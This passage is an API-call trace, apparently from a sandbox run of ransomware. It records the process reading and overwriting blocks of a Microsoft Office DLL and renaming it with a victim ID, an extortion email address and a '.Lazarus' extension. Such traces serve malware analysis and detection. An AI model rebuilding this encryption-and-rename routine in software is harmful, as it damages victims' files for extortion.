hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x93468 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0076.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0076.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.595] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.595] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80acba0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80acba0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbbdc5100, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x22e0a8, dwReserved0=0xe95526a3, dwReserved1=0x305bff0a, cFileName="AppvIsvSubsystems64.dll", cAlternateFileName="AP4400~1.DLL")) returned 1 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0076.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0076.596] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.596] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.596] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.596] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0076.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.596] AreFileApisANSI () returned 1 [0076.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 82 [0076.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0076.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.597] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0076.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0076.597] AreFileApisANSI () returned 1 [0076.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f0b8 [0076.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x5f0b8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 82 [0076.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.597] GetFileType (hFile=0x430) returned 0x1 [0076.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0076.597] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0076.598] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0076.598] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0076.598] CloseHandle (hObject=0x430) returned 1 [0076.598] AreFileApisANSI () returned 1 [0076.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5fbb8 [0076.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x5fbb8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 82 [0076.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.598] GetFileType (hFile=0x430) returned 0x1 [0076.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0076.598] CloseHandle (hObject=0x430) returned 1 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0076.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0076.600] AreFileApisANSI () returned 1 [0076.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f0b8 [0076.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x5f0b8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 82 [0076.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80acba0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80acba0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbbdc5100, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x22e0a8)) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0076.600] AreFileApisANSI () returned 1 [0076.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0076.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0076.601] GetLastError () returned 0x0 [0076.601] SetLastError (dwErrCode=0x0) [0076.601] AreFileApisANSI () returned 1 [0076.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0076.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60348 [0076.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 82 [0076.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.601] GetFileType (hFile=0x430) returned 0x1 [0076.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0076.601] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0076.601] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0076.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0076.604] ReadFile (in: hFile=0x430, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0076.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0076.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0076.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0076.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0076.605] GetLastError () returned 0x0 [0076.605] SetLastError (dwErrCode=0x0) [0076.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.605] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0076.606] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0076.606] WriteFile (in: hFile=0x430, lpBuffer=0x88b38*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0076.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0076.606] CloseHandle (hObject=0x430) returned 1 [0077.091] AreFileApisANSI () returned 1 [0077.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0077.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5ef58 [0077.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x5ef58, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 82 [0077.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.091] GetFileType (hFile=0x430) returned 0x1 [0077.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0077.092] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0077.092] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0077.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x93678 [0077.093] ReadFile (in: hFile=0x430, lpBuffer=0x93678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0077.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dee0 [0077.093] GetLastError () returned 0x0 [0077.093] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0077.093] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0077.093] WriteFile (in: hFile=0x430, lpBuffer=0x93678*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0077.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x93678 | out: hHeap=0x20000) returned 1 [0077.094] CloseHandle (hObject=0x430) returned 1 [0077.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0077.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a790 [0077.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0077.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0077.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0077.557] AreFileApisANSI () returned 1 [0077.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0077.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x604a8 [0077.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x604a8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 82 [0077.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0077.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x8b218 [0077.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x8b218, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0077.557] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 